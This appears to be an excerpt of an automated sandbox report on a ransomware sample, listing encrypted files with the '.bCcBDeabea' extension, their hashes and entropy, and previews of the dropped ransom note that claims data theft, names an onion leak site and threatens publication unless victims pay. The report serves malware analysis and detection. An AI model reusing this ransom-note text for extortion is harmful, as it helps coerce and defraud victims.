                        SHA-256:3A2E4553302AD38E338B6E291F2ADD041E1AC5C59248AEFA1F2BEEDB44D444C5
                        SHA-512:FDF7A1F89C847CB4AE155568ECC66D9515C7F7727C9F3E960DF7B45EFBD4F4F40D0AE4156DEC3B7F7C14FF9D558D460BE8CDB5E256A607AAA6B217362F0440AF
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980538899760363
                        Encrypted:false
                        SSDEEP:192:ZAE4/1zdV9XFMaEhv3ZorCLLH6Qvu9I6X2Zn+a9PyG/wuF2csvV+n:Zop4am/ZorC/HRvu9IWSnFyG/wun
                        MD5:9CC5974F5685D94A4F42A3BCD8D17FCE
                        SHA1:177F93B0C98EE538D2088DEC3ABA28F180545B5E
                        SHA-256:3A2E4553302AD38E338B6E291F2ADD041E1AC5C59248AEFA1F2BEEDB44D444C5
                        SHA-512:FDF7A1F89C847CB4AE155568ECC66D9515C7F7727C9F3E960DF7B45EFBD4F4F40D0AE4156DEC3B7F7C14FF9D558D460BE8CDB5E256A607AAA6B217362F0440AF
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975620479137032
                        Encrypted:false
                        SSDEEP:192:Nms5Q6dygYLULRtiMBW948Jz8fW1tUuBEQgxZUbV6AeWyQV+n:x5Q6sXLUL41Jwfqt94JWyp
                        MD5:56FDCA0F8994852C676076FB15F105F0
                        SHA1:5478462C34AE79FED8C1BC5B0AE1D4198C724FC6
                        SHA-256:25F32C69D3D6CED7CEE19B942DBBE89DB2D541DAA799ACF6B551A7C835B3B8FF
                        SHA-512:3388E84C382B62B1DA4EDB2593A52184A0616F6F2F90BB7078142A94E5BF2788F47C98C62D050B86FA705482F30F7381A43E00239E61E0833957ADDABF948F9E
                        Malicious:true
                        C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975620479137032
                        Encrypted:false
                        SSDEEP:192:Nms5Q6dygYLULRtiMBW948Jz8fW1tUuBEQgxZUbV6AeWyQV+n:x5Q6sXLUL41Jwfqt94JWyp
                        MD5:56FDCA0F8994852C676076FB15F105F0
                        SHA1:5478462C34AE79FED8C1BC5B0AE1D4198C724FC6
                        SHA-256:25F32C69D3D6CED7CEE19B942DBBE89DB2D541DAA799ACF6B551A7C835B3B8FF
                        SHA-512:3388E84C382B62B1DA4EDB2593A52184A0616F6F2F90BB7078142A94E5BF2788F47C98C62D050B86FA705482F30F7381A43E00239E61E0833957ADDABF948F9E
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ\PALRGUCVEH.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978353269558998
                        Encrypted:false
                        SSDEEP:192:lIJYaHSWMiN6PrTjsOoEUNHu+UvuYTJFRZy+2arOV+n:CJYaHlMiIrsOohg+A1Zyw
                        MD5:0DB5E91DC7F4D76BF8600F70451C2521
                        SHA1:98C5EF5BA7E819D39D1736FFE97BAD948CFEBEA6
                        SHA-256:3B275F33A89D9000E2CC28691DD344A03CA92577B488E2CA41D622A0058B4DDE
                        SHA-512:AB55398EC9CC5D7A8BEAE202109229CE2AA37873C709B9D393B4CF9565033D28268C6237FD0421DF13FD734027BD71ABBB058BD7F03D1AAF0BD6971DF9C00E93
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ\PALRGUCVEH.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978353269558998
                        Encrypted:false
                        SSDEEP:192:lIJYaHSWMiN6PrTjsOoEUNHu+UvuYTJFRZy+2arOV+n:CJYaHlMiIrsOohg+A1Zyw
                        MD5:0DB5E91DC7F4D76BF8600F70451C2521
                        SHA1:98C5EF5BA7E819D39D1736FFE97BAD948CFEBEA6
                        SHA-256:3B275F33A89D9000E2CC28691DD344A03CA92577B488E2CA41D622A0058B4DDE
                        SHA-512:AB55398EC9CC5D7A8BEAE202109229CE2AA37873C709B9D393B4CF9565033D28268C6237FD0421DF13FD734027BD71ABBB058BD7F03D1AAF0BD6971DF9C00E93
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975121053775242
                        Encrypted:false
                        SSDEEP:192:RwbPrGt4MpOUPYhwI/iI2Thy8+4+NJBHKB4nk8/3FgILIuv2SV+n:+jU/pOUg2grXJlKBUvFgIbi
                        MD5:2D72C7C1572D9967D41331970844F005
                        SHA1:864D2B658A51BE707EC40AFEC21C4D0FA452FEA1
                        SHA-256:B3F9670BB1451A22903E30E801B2DAC1D247E4C972431BD0648DF2A3D23FB552
                        SHA-512:48C0DB4EAEC79BE3E529586E5402FFD470A5CDE85A676E765194DC8FE75B38A9E05E99932AFF12550E1D2C794B82A9AEA5CD7AE178B25B741C3EBF52E8FFB6F0
                        Malicious:true
                        C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975121053775242
                        Encrypted:false
                        SSDEEP:192:RwbPrGt4MpOUPYhwI/iI2Thy8+4+NJBHKB4nk8/3FgILIuv2SV+n:+jU/pOUg2grXJlKBUvFgIbi
                        MD5:2D72C7C1572D9967D41331970844F005
                        SHA1:864D2B658A51BE707EC40AFEC21C4D0FA452FEA1
                        SHA-256:B3F9670BB1451A22903E30E801B2DAC1D247E4C972431BD0648DF2A3D23FB552
                        SHA-512:48C0DB4EAEC79BE3E529586E5402FFD470A5CDE85A676E765194DC8FE75B38A9E05E99932AFF12550E1D2C794B82A9AEA5CD7AE178B25B741C3EBF52E8FFB6F0
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ\SQSJKEBWDT.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9769649874809625
                        Encrypted:false
                        SSDEEP:192:2gkXqYhAW7OPb78O8sTh44EIo02Wdj6Ex6NgOyn8NDM1TM0j84V+n:2gkaYn7O8nsl44/o0fCgZ8NDl
                        MD5:F90BFD93626100A27EE9CB7895458A58
                        SHA1:B1D9ECA7009646151EC1EB46F456BC0CD3B82BF4
                        SHA-256:A74214BA0B242C0B0D3BE1ED8FF2342996868CEBEDFB856CF6A41A24981CD901
                        SHA-512:A9534F08EE8249B8E3D02BBDB236A38F1BFD38D8767AA83904E54E4EC8239F454865EA9F192AB4AAC0BE8A5689E3BBBE9BDD9D7FDC3DC96E8FB9D39AC4AB920D
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ\SQSJKEBWDT.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9769649874809625
                        Encrypted:false
                        SSDEEP:192:2gkXqYhAW7OPb78O8sTh44EIo02Wdj6Ex6NgOyn8NDM1TM0j84V+n:2gkaYn7O8nsl44/o0fCgZ8NDl
                        MD5:F90BFD93626100A27EE9CB7895458A58
                        SHA1:B1D9ECA7009646151EC1EB46F456BC0CD3B82BF4
                        SHA-256:A74214BA0B242C0B0D3BE1ED8FF2342996868CEBEDFB856CF6A41A24981CD901
                        SHA-512:A9534F08EE8249B8E3D02BBDB236A38F1BFD38D8767AA83904E54E4EC8239F454865EA9F192AB4AAC0BE8A5689E3BBBE9BDD9D7FDC3DC96E8FB9D39AC4AB920D
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977333473305457
                        Encrypted:false
                        SSDEEP:192:3swzRNxhlxBJL1CniRWEkogQInb0ncftkfvNdV+n:3bRNxpBLKEOQIn4cFh
                        MD5:96F0F1B578D8866C95A99933FF8CDC02
                        SHA1:431317EC5043415D882E62EA531076A9F88F0793
                        SHA-256:E7A01672AF61C667647B4F680BC1D9F9D63907DC0F172C5F5B479E923B00946D
                        SHA-512:48F76F4C1D20A61A42060EF47DE3BEBE139AA77593820936B48BB3ECB9B634D866C61DE68686CC97C7928250F5042C20B25707EBDF775B2B134CA2EBC2293140
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977333473305457
                        Encrypted:false
                        SSDEEP:192:3swzRNxhlxBJL1CniRWEkogQInb0ncftkfvNdV+n:3bRNxpBLKEOQIn4cFh
                        MD5:96F0F1B578D8866C95A99933FF8CDC02
                        SHA1:431317EC5043415D882E62EA531076A9F88F0793
                        SHA-256:E7A01672AF61C667647B4F680BC1D9F9D63907DC0F172C5F5B479E923B00946D
                        SHA-512:48F76F4C1D20A61A42060EF47DE3BEBE139AA77593820936B48BB3ECB9B634D866C61DE68686CC97C7928250F5042C20B25707EBDF775B2B134CA2EBC2293140
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ\ZGGKNSUKOP.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97385858418915
                        Encrypted:false
                        SSDEEP:192:xjnuFwDrCl9UCeF58cFUlqcmN2W7SNOlXbgweV+n:0wrClselZmN2DK0wL
                        MD5:9DCEB64E009429AF62B508BDF1BB8D25
                        SHA1:6B81D5024FDB1456DA785193DB339CB21515560B
                        SHA-256:3039B3328ABB02A2EEA135565BB7C044665DBF9352A968F716CA46BC3B86DB0A
                        SHA-512:CD077EC64325FA6FA1D35404FF2FB798052485E94F99E4A18846200FD2B99D76DB0B5492C510F491E415043614A3315F041D6B88941EEF2BB1BB83400ED53CDE
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ\ZGGKNSUKOP.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97385858418915
                        Encrypted:false
                        SSDEEP:192:xjnuFwDrCl9UCeF58cFUlqcmN2W7SNOlXbgweV+n:0wrClselZmN2DK0wL
                        MD5:9DCEB64E009429AF62B508BDF1BB8D25
                        SHA1:6B81D5024FDB1456DA785193DB339CB21515560B
                        SHA-256:3039B3328ABB02A2EEA135565BB7C044665DBF9352A968F716CA46BC3B86DB0A
                        SHA-512:CD077EC64325FA6FA1D35404FF2FB798052485E94F99E4A18846200FD2B99D76DB0B5492C510F491E415043614A3315F041D6B88941EEF2BB1BB83400ED53CDE
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:dropped
                        Size (bytes):3775
                        Entropy (8bit):5.733902755295598
                        Encrypted:false
                        SSDEEP:48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69/:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USz
                        MD5:48E5A2612CDA2F13A8F5805C4729B202
                        SHA1:E1C2C4BF2573F95BD36F04524D97C782D6BED687
                        SHA-256:1B7D3016E5D63665C14C4F32119FCD1DFC6E523418BF498545BD5F2B6DD61F4C
                        SHA-512:CE6F36F42414951E290A6E84F81A8A96B3200B56385ACCF06EA1DE63B68695A48F45D5BC5F926E02774B107A933A8656B77381D23829DD0FA2B764C8CF657FB3
                        Malicious:false
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        C:\Users\user\Desktop\SQSJKEBWDT.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9825890711738445
                        Encrypted:false
                        SSDEEP:192:iW6ed4PS9NKrabdCZNMAOOkPhj9Mu06OOkQSFxSZV+n:ifJW+WhRvYIm5
                        MD5:CD449FC1F57E31C43ED0892AD55C0911
                        SHA1:985E98A4753DC101DD091F3729E4D306D46FDE76
                        SHA-256:05230D1AD580B9A1F967DC1293D47B8FE33BC74F7B34A85A2D69DDEFFD7CE0A8
                        SHA-512:0B369541278EB8821D9F931D683B51F71488F5F5FAFEDBAF7008ACAFE436A0B02FA2C97AC63D6B0CE65D41905CF832F694D8CC626E905F637A4E2FC6D4B9C418
                        Malicious:false
                        C:\Users\user\Desktop\SQSJKEBWDT.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9825890711738445
                        Encrypted:false
                        SSDEEP:192:iW6ed4PS9NKrabdCZNMAOOkPhj9Mu06OOkQSFxSZV+n:ifJW+WhRvYIm5
                        MD5:CD449FC1F57E31C43ED0892AD55C0911
                        SHA1:985E98A4753DC101DD091F3729E4D306D46FDE76
                        SHA-256:05230D1AD580B9A1F967DC1293D47B8FE33BC74F7B34A85A2D69DDEFFD7CE0A8
                        SHA-512:0B369541278EB8821D9F931D683B51F71488F5F5FAFEDBAF7008ACAFE436A0B02FA2C97AC63D6B0CE65D41905CF832F694D8CC626E905F637A4E2FC6D4B9C418
                        Malicious:false
                        C:\Users\user\Desktop\SUAVTZKNFL.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97801784462802
                        Encrypted:false
                        SSDEEP:192:+dD0nCHz20HKCr6p47DtMp7bsz5EYRUO0VMQyPcXEecX3H1fLV+n:PATvrXtMp7i5EImVMNcOHHxs
                        MD5:35A1C1E18B19CD1D7D9EAE2236F1F48F
                        SHA1:833E616EBE2F358A2B62669A52AC714682DD989F
                        SHA-256:6CF67F88332E3F09E0C433E074790524D30A0BCDEFD6DDC99B0E1B0ACE618290
                        SHA-512:188C5F4E5749AC34CB3EC451DA88090EF697B38E358CEA1B38DAE58F11E1429C269A68A64AD63E5B7079B9FFB14649BF698AEDF56B2635B51864D1DF6430CFF1
                        Malicious:false
                        C:\Users\user\Desktop\SUAVTZKNFL.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97801784462802
                        Encrypted:false
                        SSDEEP:192:+dD0nCHz20HKCr6p47DtMp7bsz5EYRUO0VMQyPcXEecX3H1fLV+n:PATvrXtMp7i5EImVMNcOHHxs
                        MD5:35A1C1E18B19CD1D7D9EAE2236F1F48F
                        SHA1:833E616EBE2F358A2B62669A52AC714682DD989F
                        SHA-256:6CF67F88332E3F09E0C433E074790524D30A0BCDEFD6DDC99B0E1B0ACE618290
                        SHA-512:188C5F4E5749AC34CB3EC451DA88090EF697B38E358CEA1B38DAE58F11E1429C269A68A64AD63E5B7079B9FFB14649BF698AEDF56B2635B51864D1DF6430CFF1
                        Malicious:false
                        C:\Users\user\Desktop\SUAVTZKNFL.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.982133728343291
                        Encrypted:false
                        SSDEEP:192:G9BGLtnEEOP+kPvHm8oblTnHyIP7IihQs+J785q1oxcxV+n:GqLtEDPNm8YlTnSIP7Iij+J785q1oxcu
                        MD5:71503B8FAD2224BBBA0DD18F73FE3A63
                        SHA1:1816FC21433626A53C83D580BF74459850AB5092
                        SHA-256:8D9DDA40D0DD943B7A9955D2F002C9E40DCBDAC08184559C6F62A67EFAAD839A
                        SHA-512:580C5FE18D1F20D2966239876B08736D11563E8A17456B3A3E81C47B2EE83E0E4EE3CE76AF41462DBDB5C6D946E78FBEB187A50C407429689CD4F38593D720C7
                        Malicious:false
                        C:\Users\user\Desktop\SUAVTZKNFL.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.982133728343291
                        Encrypted:false
                        SSDEEP:192:G9BGLtnEEOP+kPvHm8oblTnHyIP7IihQs+J785q1oxcxV+n:GqLtEDPNm8YlTnSIP7Iij+J785q1oxcu
                        MD5:71503B8FAD2224BBBA0DD18F73FE3A63
                        SHA1:1816FC21433626A53C83D580BF74459850AB5092
                        SHA-256:8D9DDA40D0DD943B7A9955D2F002C9E40DCBDAC08184559C6F62A67EFAAD839A
                        SHA-512:580C5FE18D1F20D2966239876B08736D11563E8A17456B3A3E81C47B2EE83E0E4EE3CE76AF41462DBDB5C6D946E78FBEB187A50C407429689CD4F38593D720C7
                        Malicious:false
                        C:\Users\user\Desktop\ZGGKNSUKOP.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976858563339414
                        Encrypted:false
                        SSDEEP:96:lwi7xlVo04wsZ4uMOQ1OzifjR8mLn4lyQ9IEo9TpL/hN5C9b1Fo64WrX6TgamOLg:nwflzi5dxRYRVGZwiJlOS2nyV+n
                        MD5:75B41A9884E670E3122B502625945C4F
                        SHA1:718309E610BF5A9C9D0FD1A9DA9411527126891B
                        SHA-256:8FA89C2D72133BDC3965578D6380A1DE9ECCCEAC7992C9AF4132E994CA7B4BBD
                        SHA-512:DAD40B43C22F1A0BBE80CE78BBB9793B58C0988BB208EFC24FCA42B065193E578EF9095F1815C99C1DAF6709D22E41BC1AFF3184D837030CD5DCD2277BFC17FB
                        Malicious:false
                        C:\Users\user\Desktop\ZGGKNSUKOP.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976858563339414
                        Encrypted:false
                        SSDEEP:96:lwi7xlVo04wsZ4uMOQ1OzifjR8mLn4lyQ9IEo9TpL/hN5C9b1Fo64WrX6TgamOLg:nwflzi5dxRYRVGZwiJlOS2nyV+n
                        MD5:75B41A9884E670E3122B502625945C4F
                        SHA1:718309E610BF5A9C9D0FD1A9DA9411527126891B
                        SHA-256:8FA89C2D72133BDC3965578D6380A1DE9ECCCEAC7992C9AF4132E994CA7B4BBD
                        SHA-512:DAD40B43C22F1A0BBE80CE78BBB9793B58C0988BB208EFC24FCA42B065193E578EF9095F1815C99C1DAF6709D22E41BC1AFF3184D837030CD5DCD2277BFC17FB
                        Malicious:false
                        C:\Users\user\Desktop\ZQIXMVQGAH.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977778621685226
                        Encrypted:false
                        SSDEEP:192:mTbglMUIvyEz2rX/2yQ/SpGfaK6bs08rlO0H6YuPHH4C09RV+n:mvglMUg2HQ/S6aK+E4fNPHd09O
                        MD5:23CF59EA3AFE792F21FE4A8C00125E34
                        SHA1:EB403738820421CFA040CA4B1404032788569393
                        SHA-256:6C47D734DA1F9817030D14E744D7EBA1C7EC793A86E8713CBCCAB00B907E43B8
                        SHA-512:4C01EB5F094A5D9621182D28958F14E1C0E51D5938D9804B2B38D8CE5B8DC3206FBE4F75B504B76B79DC970F0C1AB3FB31BC92286C294D06818C7BDDA4F69080
                        Malicious:false
                        C:\Users\user\Desktop\ZQIXMVQGAH.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977778621685226
                        Encrypted:false
                        SSDEEP:192:mTbglMUIvyEz2rX/2yQ/SpGfaK6bs08rlO0H6YuPHH4C09RV+n:mvglMUg2HQ/S6aK+E4fNPHd09O
                        MD5:23CF59EA3AFE792F21FE4A8C00125E34
                        SHA1:EB403738820421CFA040CA4B1404032788569393
                        SHA-256:6C47D734DA1F9817030D14E744D7EBA1C7EC793A86E8713CBCCAB00B907E43B8
                        SHA-512:4C01EB5F094A5D9621182D28958F14E1C0E51D5938D9804B2B38D8CE5B8DC3206FBE4F75B504B76B79DC970F0C1AB3FB31BC92286C294D06818C7BDDA4F69080
                        Malicious:false
                        C:\Users\user\Desktop\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:dropped
                        Size (bytes):3759
                        Entropy (8bit):5.730136376079227
                        Encrypted:false
                        SSDEEP:48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69x:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USV
                        MD5:BC4005FCEBB2809AD1A3FC9BFC770F3A
                        SHA1:A8E345EDAAD48C68C4D51500F353A3593BAABC08
                        SHA-256:A1CC398783672B546E12D4A5EB5642A7E489A5BBF706456F6E31AF4D23AD6A3B
                        SHA-512:5D18730BA64987F6A10704D3360F3AE9BEB55F86F9AFBCA5372440CB53799C3D6A108A6802C943380EB42DEB53FE19332DE75711593284520FEF55198665D76E
                        Malicious:false
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        C:\Users\user\Documents\BNAGMGSPLO.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975973249865253
                        Encrypted:false
                        SSDEEP:192:hmfcT2lws1S5xJwkDAwzOCzkLPbs0xY3Pw6tVbqnPoV+n:KcThs1IwkDAXCzkLwLVbqPx
                        MD5:2DF9548BCB84A6887C5F3547B716F2D1
                        SHA1:1CA0D7F6A5C83DFB6F70703EFC1CEE73A5D865D0
                        SHA-256:FE582B581489E32FAD98813E86B8A2F2C1D0687E28020F80351CC30EA272D3F6
                        SHA-512:7CD1131ED325F2595A05B0FC08F5803E26B7162A96F2A5F22FED893691D312361B230E3D736D5C1B2946D3E250642554BB1857427D122C0A408D7A1FE105DAEE
                        Malicious:false
                        C:\Users\user\Documents\BNAGMGSPLO.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975973249865253
                        Encrypted:false
                        SSDEEP:192:hmfcT2lws1S5xJwkDAwzOCzkLPbs0xY3Pw6tVbqnPoV+n:KcThs1IwkDAXCzkLwLVbqPx
                        MD5:2DF9548BCB84A6887C5F3547B716F2D1
                        SHA1:1CA0D7F6A5C83DFB6F70703EFC1CEE73A5D865D0
                        SHA-256:FE582B581489E32FAD98813E86B8A2F2C1D0687E28020F80351CC30EA272D3F6
                        SHA-512:7CD1131ED325F2595A05B0FC08F5803E26B7162A96F2A5F22FED893691D312361B230E3D736D5C1B2946D3E250642554BB1857427D122C0A408D7A1FE105DAEE
                        Malicious:false
                        C:\Users\user\Documents\EEGWXUHVUG.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979119574837885
                        Encrypted:false
                        SSDEEP:192:DmVS9drONMnN1jMaHlRdAHmS/9XDnhkLBiGabHCBYV+n:F6aN1waHlRE/9XDnQBi3iBB
                        MD5:432F844E78E55603BCF423CED2F41FD3
                        SHA1:3B2BC3C7419EB461FAAEDC085D0E6141AE9D9D65
                        SHA-256:7FB2181204E0DF582D73A87710DC820244FC811CFBEFABF4E3F2A238A889A932
                        SHA-512:5EA8FE8D4A9DB997BAD9DC9F53FACABC693FC781D3B167E6E47651AC072CB7C708B2CD9B83C729DC48030D9A1A325652D07ED938D4ACC83860EE629DDD819F94
                        Malicious:false
                        C:\Users\user\Documents\EEGWXUHVUG.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979119574837885
                        Encrypted:false
                        SSDEEP:192:DmVS9drONMnN1jMaHlRdAHmS/9XDnhkLBiGabHCBYV+n:F6aN1waHlRE/9XDnQBi3iBB
                        MD5:432F844E78E55603BCF423CED2F41FD3
                        SHA1:3B2BC3C7419EB461FAAEDC085D0E6141AE9D9D65
                        SHA-256:7FB2181204E0DF582D73A87710DC820244FC811CFBEFABF4E3F2A238A889A932
                        SHA-512:5EA8FE8D4A9DB997BAD9DC9F53FACABC693FC781D3B167E6E47651AC072CB7C708B2CD9B83C729DC48030D9A1A325652D07ED938D4ACC83860EE629DDD819F94
                        Malicious:false
                        C:\Users\user\Documents\EFOYFBOLXA.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9781551548759015
                        Encrypted:false
                        SSDEEP:192:EkYONEeDIJcTErEnsgQhgF6K8dSPDFl1WLJkLkudkc8BdvwV+n:EkYONEe2cTpm2EHdSLZWCeRL
                        MD5:06654039C5F933CFA2EEC4D750A74DF5
                        SHA1:026FF645FAB17FF0CFBD0F372840119E952FAAB2
                        SHA-256:B370F2648964D4AFB50C6EFB10068910088AF3811BB6E501B5D5F6248C346120
                        SHA-512:8A4FBCA824A6C0931ECE1A1CD4A7963F9681A3FEE2DF36E1F6D25DAFD8354606C18756242B90C25AF40D66AEBD7D387B9FE9A6D9892A0BA81309F71154EB95AC
                        Malicious:false
                        C:\Users\user\Documents\EFOYFBOLXA.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9781551548759015
                        Encrypted:false
                        SSDEEP:192:EkYONEeDIJcTErEnsgQhgF6K8dSPDFl1WLJkLkudkc8BdvwV+n:EkYONEe2cTpm2EHdSLZWCeRL
                        MD5:06654039C5F933CFA2EEC4D750A74DF5
                        SHA1:026FF645FAB17FF0CFBD0F372840119E952FAAB2
                        SHA-256:B370F2648964D4AFB50C6EFB10068910088AF3811BB6E501B5D5F6248C346120
                        SHA-512:8A4FBCA824A6C0931ECE1A1CD4A7963F9681A3FEE2DF36E1F6D25DAFD8354606C18756242B90C25AF40D66AEBD7D387B9FE9A6D9892A0BA81309F71154EB95AC
                        Malicious:false
                        C:\Users\user\Documents\EFOYFBOLXA.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976427242589434
                        Encrypted:false
                        SSDEEP:192:nUCyyCchlWapf9fHToARU0wrVoz6gH8y4zCJGrpGm1JIErvfU9V+n:UCJ1hl5FEOsrO6g4zeGT1J1H3
                        MD5:20CBF10010208A2F4D0B291E62757E1E
                        SHA1:5B7CDD890C01F28F35E77005991B3E7A2C4C83E2
                        SHA-256:AED905F09E4E1F08EEB5B3DFBDBCEBCEA064DF7D5F14C97A09DE9C9C3EDF49E1
                        SHA-512:9033F01D3DC0D872547249C9E8FA5C6664D24167ACBAFB42E29212DFF06BE0AA6F3C1F907138C907CF6380482B3EA50A5495A0318DDCDC4B17C9325EB60DA372
                        Malicious:false
                        C:\Users\user\Documents\EFOYFBOLXA.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976427242589434
                        Encrypted:false
                        SSDEEP:192:nUCyyCchlWapf9fHToARU0wrVoz6gH8y4zCJGrpGm1JIErvfU9V+n:UCJ1hl5FEOsrO6g4zeGT1J1H3
                        MD5:20CBF10010208A2F4D0B291E62757E1E
                        SHA1:5B7CDD890C01F28F35E77005991B3E7A2C4C83E2
                        SHA-256:AED905F09E4E1F08EEB5B3DFBDBCEBCEA064DF7D5F14C97A09DE9C9C3EDF49E1
                        SHA-512:9033F01D3DC0D872547249C9E8FA5C6664D24167ACBAFB42E29212DFF06BE0AA6F3C1F907138C907CF6380482B3EA50A5495A0318DDCDC4B17C9325EB60DA372
                        Malicious:false
